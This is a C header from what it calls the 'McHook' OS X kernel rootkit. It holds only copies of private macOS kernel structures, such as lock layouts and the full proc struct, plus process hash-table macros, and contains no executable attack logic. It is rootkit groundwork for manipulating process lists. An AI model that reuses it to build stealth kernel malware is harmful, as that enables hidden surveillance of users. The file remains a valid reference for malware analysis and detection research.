proc_internal.h
/*
* McHook, proc_internal.h
* OS X KSpace Rootkit
*
* Definitions needed by the KEXT and not exported
*
* Created by revenge on 20/03/2009
* Copyright (C) HT srl 2009. All rights reserved
*
*/
#ifndef _SYS_PROC_INTERNAL_H_
#define _SYS_PROC_INTERNAL_H_
#include <libkern/OSAtomic.h>
#include <sys/proc.h>
__BEGIN_DECLS
#include <kern/locks.h>
__END_DECLS
struct proc;
#define PROC_NULL (struct proc *)0
#if (defined(MAC_OS_X_VERSION_10_7) && MAC_OS_X_VERSION_MAX_ALLOWED >= MAC_OS_X_VERSION_10_7)
#define MACH_KERNEL_PRIVATE
#define __APPLE_API_UNSTABLE
#define SYSCTL_DEF_ENABLED
#define PROC_DEF_ENABLED
typedef struct m_lck_mtx {
union {
struct {
volatile uintptr_t lck_mtxd_owner;
union {
struct {
volatile uint32_t
lck_mtxd_waiters:16,
lck_mtxd_pri:8,
lck_mtxd_ilocked:1,
lck_mtxd_mlocked:1,
lck_mtxd_promoted:1,
lck_mtxd_spin:1,
lck_mtxd_is_ext:1,
lck_mtxd_pad3:3;
} a;
uint32_t lck_mtxd_state;
} b;
#if defined(__x86_64__)
/* Pad field used as a canary, initialized to ~0 */
uint32_t lck_mtxd_pad32;
#endif
} lck_mtxd;
struct {
struct _lck_mtx_ext_ *lck_mtxi_ptr;
uint32_t lck_mtxi_tag;
#if defined(__x86_64__)
uint32_t lck_mtxi_pad32;
#endif
} lck_mtxi;
} lck_mtx_sw;
} m_lck_mtx_t;
typedef struct m_lck_spin {
volatile uintptr_t interlock;
#if MACH_LDEBUG
unsigned long lck_spin_pad[9]; /* XXX - usimple_lock_data_t */
#endif
} m_lck_spin_t;
/*
* Added by SPARTA, Inc.
*/
/*
* Login context.
*/
struct lctx {
LIST_ENTRY(lctx) lc_list; /* List of all login contexts. */
LIST_HEAD(, proc) lc_members; /* Pointer to lc members. */
int lc_mc; /* Member Count. */
pid_t lc_id; /* Login context ID. */
struct label *lc_label; /* Login context MAC label. */
};
SLIST_HEAD(klist, knote);
struct proc {
LIST_ENTRY(proc) p_list; /* List of all processes. */
pid_t p_pid; /* Process identifier. (static)*/
void * task; /* corresponding task (static)*/
struct proc * p_pptr; /* Pointer to parent process.(LL) */
pid_t p_ppid; /* process's parent pid number */
pid_t p_pgrpid; /* process group id of the process (LL)*/
uid_t p_uid;
gid_t p_gid;
uid_t p_ruid;
gid_t p_rgid;
uid_t p_svuid;
gid_t p_svgid;
uint64_t p_uniqueid; /* process uniqe ID */
m_lck_mtx_t p_mlock; // [> mutex lock for proc <]
char p_stat; /* S* process status. (PL)*/
char p_shutdownstate;
char p_kdebug; /* P_KDEBUG eq (CC)*/
char p_btrace; /* P_BTRACE eq (CC)*/
LIST_ENTRY(proc) p_pglist; /* List of processes in pgrp.(PGL) */
LIST_ENTRY(proc) p_sibling; /* List of sibling processes. (LL)*/
LIST_HEAD(, proc) p_children; /* Pointer to list of children. (LL)*/
TAILQ_HEAD( , uthread) p_uthlist; /* List of uthreads (PL) */
LIST_ENTRY(proc) p_hash; /* Hash chain. (LL)*/
TAILQ_HEAD( ,eventqelt) p_evlist; /* (PL) */
m_lck_mtx_t p_fdmlock; /* proc lock to protect fdesc */
/* substructures: */
kauth_cred_t p_ucred; /* Process owner's identity. (PL) */
struct filedesc *p_fd; /* Ptr to open files structure. (PFDL) */
struct pstats *p_stats; /* Accounting/statistics (PL). */
struct plimit *p_limit; /* Process limits.(PL) */
struct sigacts *p_sigacts; /* Signal actions, state (PL) */
int p_siglist; /* signals captured back from threads */
m_lck_spin_t p_slock; /* spin lock for itimer/profil protection */
#define p_rlimit p_limit->pl_rlimit
struct plimit *p_olimit; /* old process limits - not inherited by child (PL) */
unsigned int p_flag; /* P_* flags. (atomic bit ops) */
unsigned int p_lflag; /* local flags (PL) */
unsigned int p_listflag; /* list flags (LL) */
unsigned int p_ladvflag; /* local adv flags (atomic) */
int p_refcount; /* number of outstanding users(LL) */
int p_childrencnt; /* children holding ref on parent (LL) */
int p_parentref; /* children lookup ref on parent (LL) */
pid_t p_oppid; /* Save parent pid during ptrace. XXX */
u_int p_xstat; /* Exit status for wait; also stop signal. */
#ifdef _PROC_HAS_SCHEDINFO_
/* may need cleanup, not used */
u_int p_estcpu; /* Time averaged value of p_cpticks.(used by aio and proc_comapre) */
fixpt_t p_pctcpu; /* %cpu for this process during p_swtime (used by aio)*/
u_int p_slptime; /* used by proc_compare */
#endif /* _PROC_HAS_SCHEDINFO_ */
struct itimerval p_realtimer; /* Alarm timer. (PSL) */
struct timeval p_rtime; /* Real time.(PSL) */
struct itimerval p_vtimer_user; /* Virtual timers.(PSL) */
struct itimerval p_vtimer_prof; /* (PSL) */
struct timeval p_rlim_cpu; /* Remaining rlim cpu value.(PSL) */
int p_debugger; /* NU 1: can exec set-bit programs if suser */
boolean_t sigwait; /* indication to suspend (PL) */
void *sigwait_thread; /* 'thread' holding sigwait(PL) */
void *exit_thread; /* Which thread is exiting(PL) */
int p_vforkcnt; /* number of outstanding vforks(PL) */
void * p_vforkact; /* activation running this vfork proc)(static) */
int p_fpdrainwait; /* (PFDL) */
pid_t p_contproc; /* last PID to send us a SIGCONT (PL) */
/* Following fields are info from SIGCHLD (PL) */
pid_t si_pid; /* (PL) */
u_int si_status; /* (PL) */
u_int si_code; /* (PL) */
uid_t si_uid; /* (PL) */
void * vm_shm; /* (SYSV SHM Lock) for sysV shared memory */
#if CONFIG_DTRACE
user_addr_t p_dtrace_argv; /* (write once, read only after that) */
user_addr_t p_dtrace_envp; /* (write once, read only after that) */
lck_mtx_t p_dtrace_sprlock; /* sun proc lock emulation */
int p_dtrace_probes; /* (PL) are there probes for this proc? */
u_int p_dtrace_count; /* (sprlock) number of DTrace tracepoints */
uint8_t p_dtrace_stop; /* indicates a DTrace-desired stop */
struct dtrace_ptss_page* p_dtrace_ptss_pages; /* (sprlock) list of user ptss pages */
struct dtrace_ptss_page_entry* p_dtrace_ptss_free_list; /* (atomic) list of individual ptss entries */
struct dtrace_helpers* p_dtrace_helpers; /* (dtrace_lock) DTrace per-proc private */
struct dof_ioctl_data* p_dtrace_lazy_dofs; /* (sprlock) unloaded dof_helper_t's */
#endif /* CONFIG_DTRACE */
/* XXXXXXXXXXXXX BCOPY'ed on fork XXXXXXXXXXXXXXXX */
/* The following fields are all copied upon creation in fork. */
#define p_startcopy p_argslen
u_int p_argslen; /* Length of process arguments. */
int p_argc; /* saved argc for sysctl_procargs() */
user_addr_t user_stack; /* where user stack was allocated */
struct vnode *p_textvp; /* Vnode of executable. */
off_t p_textoff; /* offset in executable vnode */
sigset_t p_sigmask; /* DEPRECATED */
sigset_t p_sigignore; /* Signals being ignored. (PL) */
sigset_t p_sigcatch; /* Signals being caught by user.(PL) */
u_char p_priority; /* (NU) Process priority. */
u_char p_resv0; /* (NU) User-priority based on p_cpu and p_nice. */
char p_nice; /* Process "nice" value.(PL) */
u_char p_resv1; /* (NU) User-priority based on p_cpu and p_nice. */
//#if CONFIG_MACF
int p_mac_enforce; /* MAC policy enforcement control */
//#endif
char p_comm[MAXCOMLEN+1];
char p_name[(2*MAXCOMLEN)+1]; /* PL */
struct pgrp *p_pgrp; /* Pointer to process group. (LL) */
#if CONFIG_EMBEDDED
int p_iopol_disk; /* disk I/O policy (PL) */
#endif /* CONFIG_EMBEDDED */
uint32_t p_csflags; /* flags for codesign (PL) */
uint32_t p_pcaction; /* action for process control on starvation */
uint8_t p_uuid[16]; /* from LC_UUID load command */
/* End area that is copied on creation. */
/* XXXXXXXXXXXXX End of BCOPY'ed on fork (AIOLOCK)XXXXXXXXXXXXXXXX */
#define p_endcopy p_aio_total_count
int p_aio_total_count; /* all allocated AIO requests for this proc */
int p_aio_active_count; /* all unfinished AIO requests for this proc */
TAILQ_HEAD( , aio_workq_entry ) p_aio_activeq; /* active async IO requests */
TAILQ_HEAD( , aio_workq_entry ) p_aio_doneq; /* completed async IO requests */
struct klist p_klist; /* knote list (PL ?)*/
struct rusage *p_ru; /* Exit information. (PL) */
int p_sigwaitcnt;
thread_t p_signalholder;
thread_t p_transholder;
/* DEPRECATE following field */
u_short p_acflag; /* Accounting flags. */
struct lctx *p_lctx; /* Pointer to login context. */
LIST_ENTRY(proc) p_lclist; /* List of processes in lctx. */
user_addr_t p_threadstart; /* pthread start fn */
user_addr_t p_wqthread; /* pthread workqueue fn */
int p_pthsize; /* pthread size */
user_addr_t p_targconc; /* target concurrency ptr */
void * p_wqptr; /* workq ptr */
int p_wqsize; /* allocated size */
boolean_t p_wqiniting; /* semaphore to serialze wq_open */
m_lck_spin_t p_wqlock; /* lock to protect work queue */
struct timeval p_start; /* starting time */
void * p_rcall;
int p_ractive;
int p_idversion; /* version of process identity */
void * p_pthhash; /* pthread waitqueue hash */
#if DIAGNOSTIC
unsigned int p_fdlock_pc[4];
unsigned int p_fdunlock_pc[4];
#if SIGNAL_DEBUG
unsigned int lockpc[8];
unsigned int unlockpc[8];
#endif /* SIGNAL_DEBUG */
#endif /* DIAGNOSTIC */
uint64_t p_dispatchqueue_offset;
};
#else
#define decl_lck_mtx_data(class,name) class lck_mtx_t name;
/*
* Description of a process.
*
* This structure contains the information needed to manage a thread of
* control, known in UN*X as a process; it has references to substructures
* containing descriptions of things that the process uses, but may share
* with related processes. The process structure and the substructures
* are always addressible except for those marked "(PROC ONLY)" below,
* which might be addressible only on a processor on which the process
* is running.
*/
struct proc {
LIST_ENTRY(proc) p_list; /* List of all processes. */
pid_t p_pid; /* Process identifier. (static)*/
void * task; /* corresponding task (static)*/
struct proc * p_pptr; /* Pointer to parent process.(LL) */
pid_t p_ppid; /* process's parent pid number */
pid_t p_pgrpid; /* process group id of the process (LL)*/
char p_stat; /* S* process status. (PL)*/
char p_shutdownstate;
char p_kdebug; /* P_KDEBUG eq (CC)*/
char p_btrace; /* P_BTRACE eq (CC)*/
LIST_ENTRY(proc) p_pglist; /* List of processes in pgrp.(PGL) */
LIST_ENTRY(proc) p_sibling; /* List of sibling processes. (LL)*/
LIST_HEAD(, proc) p_children; /* Pointer to list of children. (LL)*/
TAILQ_HEAD( , uthread) p_uthlist; /* List of uthreads (PL) */
LIST_ENTRY(proc) p_hash; /* Hash chain. (LL)*/
TAILQ_HEAD( ,eventqelt) p_evlist; /* (PL) */
/* substructures: */
kauth_cred_t p_ucred; /* Process owner's identity. (PL) */
struct filedesc *p_fd; /* Ptr to open files structure. (PFDL) */
struct pstats *p_stats; /* Accounting/statistics (PL). */
struct plimit *p_limit; /* Process limits.(PL) */
struct sigacts *p_sigacts; /* Signal actions, state (PL) */
#define p_rlimit p_limit->pl_rlimit
struct plimit *p_olimit; /* old process limits - not inherited by child (PL) */
unsigned int p_flag; /* P_* flags. (atomic bit ops) */
unsigned int p_lflag; /* local flags (PL) */
unsigned int p_listflag; /* list flags (LL) */
unsigned int p_ladvflag; /* local adv flags (atomic) */
int p_refcount; /* number of outstanding users(LL) */
int p_childrencnt; /* children holding ref on parent (LL) */
int p_parentref; /* children lookup ref on parent (LL) */
pid_t p_oppid; /* Save parent pid during ptrace. XXX */
u_int p_xstat; /* Exit status for wait; also stop signal. */
#ifdef _PROC_HAS_SCHEDINFO_
/* may need cleanup, not used */
u_int p_estcpu; /* Time averaged value of p_cpticks.(used by aio and proc_comapre) */
fixpt_t p_pctcpu; /* %cpu for this process during p_swtime (used by aio)*/
u_int p_slptime; /* used by proc_compare */
#endif /* _PROC_HAS_SCHEDINFO_ */
struct itimerval p_realtimer; /* Alarm timer. (PSL) */
struct timeval p_rtime; /* Real time.(PSL) */
struct itimerval p_vtimer_user; /* Virtual timers.(PSL) */
struct itimerval p_vtimer_prof; /* (PSL) */
struct timeval p_rlim_cpu; /* Remaining rlim cpu value.(PSL) */
int p_debugger; /* NU 1: can exec set-bit programs if suser */
boolean_t sigwait; /* indication to suspend (PL) */
void *sigwait_thread; /* 'thread' holding sigwait(PL) */
void *exit_thread; /* Which thread is exiting(PL) */
int p_vforkcnt; /* number of outstanding vforks(PL) */
void * p_vforkact; /* activation running this vfork proc)(static) */
int p_fpdrainwait; /* (PFDL) */
pid_t p_contproc; /* last PID to send us a SIGCONT (PL) */
/* Following fields are info from SIGCHLD (PL) */
pid_t si_pid; /* (PL) */
u_int si_status; /* (PL) */
u_int si_code; /* (PL) */
uid_t si_uid; /* (PL) */
void * vm_shm; /* (SYSV SHM Lock) for sysV shared memory */
#if CONFIG_DTRACE
user_addr_t p_dtrace_argv; /* (write once, read only after that) */
user_addr_t p_dtrace_envp; /* (write once, read only after that) */
int p_dtrace_probes; /* (PL) are there probes for this proc? */
u_int p_dtrace_count; /* (sprlock) number of DTrace tracepoints */
struct dtrace_ptss_page* p_dtrace_ptss_pages; /* (sprlock) list of user ptss pages */
struct dtrace_ptss_page_entry* p_dtrace_ptss_free_list; /* (atomic) list of individual ptss entries */
struct dtrace_helpers* p_dtrace_helpers; /* (dtrace_lock) DTrace per-proc private */
struct dof_ioctl_data* p_dtrace_lazy_dofs; /* (sprlock) unloaded dof_helper_t's */
#endif /* CONFIG_DTRACE */
/* XXXXXXXXXXXXX BCOPY'ed on fork XXXXXXXXXXXXXXXX */
/* The following fields are all copied upon creation in fork. */
#define p_startcopy p_argslen
u_int p_argslen; /* Length of process arguments. */
int p_argc; /* saved argc for sysctl_procargs() */
user_addr_t user_stack; /* where user stack was allocated */
struct vnode *p_textvp; /* Vnode of executable. */
off_t p_textoff; /* offset in executable vnode */
sigset_t p_sigmask; /* DEPRECATED */
sigset_t p_sigignore; /* Signals being ignored. (PL) */
sigset_t p_sigcatch; /* Signals being caught by user.(PL) */
u_char p_priority; /* (NU) Process priority. */
u_char p_resv0; /* (NU) User-priority based on p_cpu and p_nice. */
char p_nice; /* Process "nice" value.(PL) */
u_char p_resv1; /* (NU) User-priority based on p_cpu and p_nice. */
//#if CONFIG_MACF
int p_mac_enforce; /* MAC policy enforcement control */
//#endif
char p_comm[MAXCOMLEN+1];
char p_name[(2*MAXCOMLEN)+1]; /* PL */
struct pgrp *p_pgrp; /* Pointer to process group. (LL) */
int p_iopol_disk; /* disk I/O policy (PL) */
uint32_t p_csflags; /* flags for codesign (PL) */
/* End area that is copied on creation. */
/* XXXXXXXXXXXXX End of BCOPY'ed on fork (AIOLOCK)XXXXXXXXXXXXXXXX */
#define p_endcopy aio_active_count
int aio_active_count; /* entries on aio_activeq */
int aio_done_count; /* entries on aio_doneq */
TAILQ_HEAD( , aio_workq_entry ) aio_activeq; /* active async IO requests */
TAILQ_HEAD( , aio_workq_entry ) aio_doneq; /* completed async IO requests */
struct rusage *p_ru; /* Exit information. (PL) */
thread_t p_signalholder;
thread_t p_transholder;
/* DEPRECATE following field */
u_short p_acflag; /* Accounting flags. */
struct lctx *p_lctx; /* Pointer to login context. */
LIST_ENTRY(proc) p_lclist; /* List of processes in lctx. */
user_addr_t p_threadstart; /* pthread start fn */
user_addr_t p_wqthread; /* pthread workqueue fn */
int p_pthsize; /* pthread size */
void * p_wqptr; /* workq ptr */
int p_wqsize; /* allocated size */
struct timeval p_start; /* starting time */
void * p_rcall;
int p_ractive;
int p_idversion; /* version of process identity */
#if DIAGNOSTIC
unsigned int p_fdlock_pc[4];
unsigned int p_fdunlock_pc[4];
#if SIGNAL_DEBUG
unsigned int lockpc[8];
unsigned int unlockpc[8];
#endif /* SIGNAL_DEBUG */
#endif /* DIAGNOSTIC */
};
#endif
/* Lock and unlock a login context. */
#define LCTX_LOCK(lc) lck_mtx_lock(&(lc)->lc_mtx)
#define LCTX_UNLOCK(lc) lck_mtx_unlock(&(lc)->lc_mtx)
#define LCTX_LOCKED(lc)
//#define LCTX_LOCK_ASSERT(lc, type)
//#define ALLLCTX_LOCK lck_mtx_lock(&alllctx_lock)
//#define ALLLCTX_UNLOCK lck_mtx_unlock(&alllctx_lock)
//extern lck_grp_t * lctx_lck_grp;
//extern lck_grp_attr_t * lctx_lck_grp_attr;
//extern lck_attr_t * lctx_lck_attr;
#define PIDHASH(pid) (&pidhashtbl[(pid) & pidhash])
//extern LIST_HEAD(pidhashhead, proc) *pidhashtbl;
//extern u_long pidhash;
#define PGRPHASH(pgid) (&pgrphashtbl[(pgid) & pgrphash])
//extern LIST_HEAD(pgrphashhead, pgrp) *pgrphashtbl;
//extern u_long pgrphash;
#define SESSHASH(sessid) (&sesshashtbl[(sessid) & sesshash])
//extern LIST_HEAD(sesshashhead, session) *sesshashtbl;
//extern u_long sesshash;
//extern lck_grp_t * proc_lck_grp;
//extern lck_grp_attr_t * proc_lck_grp_attr;
//extern lck_attr_t * proc_lck_attr;
LIST_HEAD(proclist, proc);
//extern struct proclist allproc; /* List of all processes. */
#endif /* !_SYS_PROC_INTERNAL_H_ */